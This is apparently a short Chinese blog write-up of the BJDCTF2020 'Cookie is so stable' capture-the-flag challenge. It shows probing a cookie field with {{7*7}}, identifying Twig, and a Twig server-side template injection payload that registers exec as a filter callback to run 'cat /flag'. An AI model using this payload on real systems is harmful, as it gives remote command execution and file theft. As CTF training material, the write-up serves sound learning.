
找了一圈,在flag.php页面发现一个输入框,抓包看下

提示要在cookie进行攻击,应该是个SSTI模板注入,传入{{7*7}}

返回49,用的是Twig模块
payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

[BJDCTF2020]Cookie is so stable
最新推荐文章于 2024-07-22 17:19:45 发布
本文介绍了一次针对flag.php页面的SSTI模板注入攻击案例。通过在cookie中发送特定payload {{7*7}
3531

被折叠的 条评论
为什么被折叠?



